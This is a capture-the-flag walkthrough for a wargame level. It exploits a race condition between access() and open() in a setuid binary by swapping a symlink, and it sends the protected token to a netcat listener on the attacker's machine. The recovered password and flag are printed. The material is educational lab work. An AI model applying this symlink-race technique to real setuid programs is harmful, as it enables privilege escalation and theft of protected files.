# Level 10 instructions:

## Check home directory:
```
total 16
-rwsr-sr-x+ 1 flag10 level10 10817 Mar  5  2016 level10
-rw-------  1 flag10 flag10     26 Mar  5  2016 token
```

We can't access the token in this case. Let's see how we can use the lvel10 executable..

## Try run the executable:
```
$ ./level10
./level10 file host
	sends file to host if you have access to it
$ ./level10 token localhost
You don't have access to token
```

It's verifying whether or not we are allowed to access the token before it sends it. Let's see how it's verifying it.

## Ltrace the executable to see what calls it's using to verify our access.
```
$ ltrace ./level10 token localhost
__libc_start_main(0x80486d4, 3, 0xbffff7c4, 0x8048970, 0x80489e0 <unfinished ...>
access("token", 4)                                                      = -1
printf("You don't have access to %s\n", "token"You don't have access to token
)                        = 31
+++ exited (status 31) +++
```

It's using the `access` syscall to verify if we have permissions to access the file. This is problematic as it's not verifying in the same step that it opens the file. Hence, we could create a race condition wherein we do have access to the file when it calls `access` but by the time it calls `open` we have swapped out the file for the file we actually want to read.

## Create race condition program:
```
<Find program from resources directory and put it in /tmp>
``` 

## See which port it sends the data on:
```
<trimmed>
Connecting to %s:6969 ..
<trimmed>
```

It seems to send the file on port 6969.

# Get our host machine's IP address, and open a listener.
```
$ ifconfig
<trimmed>
vboxnet0: flags=8943<UP,BROADCAST,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
	ether 0a:00:27:00:00:00
	inet 192.168.56.1 netmask 0xffffff00 broadcast 192.168.56.255
# nc -kl 6969
```

## Start race condition exploit:
```
$ cd /tmp
$ gcc race.c -o race
$ ./race &
```

Our program is now continually changing the symlink /tmp/tlink.

## Run level10 constantly until we see our token on our host system:
```
$ ./level10 /tmp/tlink 192.168.56.1
```
In my testing I had to run the command a dozen or so times before I got my token. Keep hitting UP-Enter until you get your result.

## Get flag:
```
$ su flag10
Password: woupa2yuojeeaaed06riuj63c
Don't forget to launch getflag !
$ getflag
Check flag.Here is your token : feulo4b72j7edeahuete3no7c
```
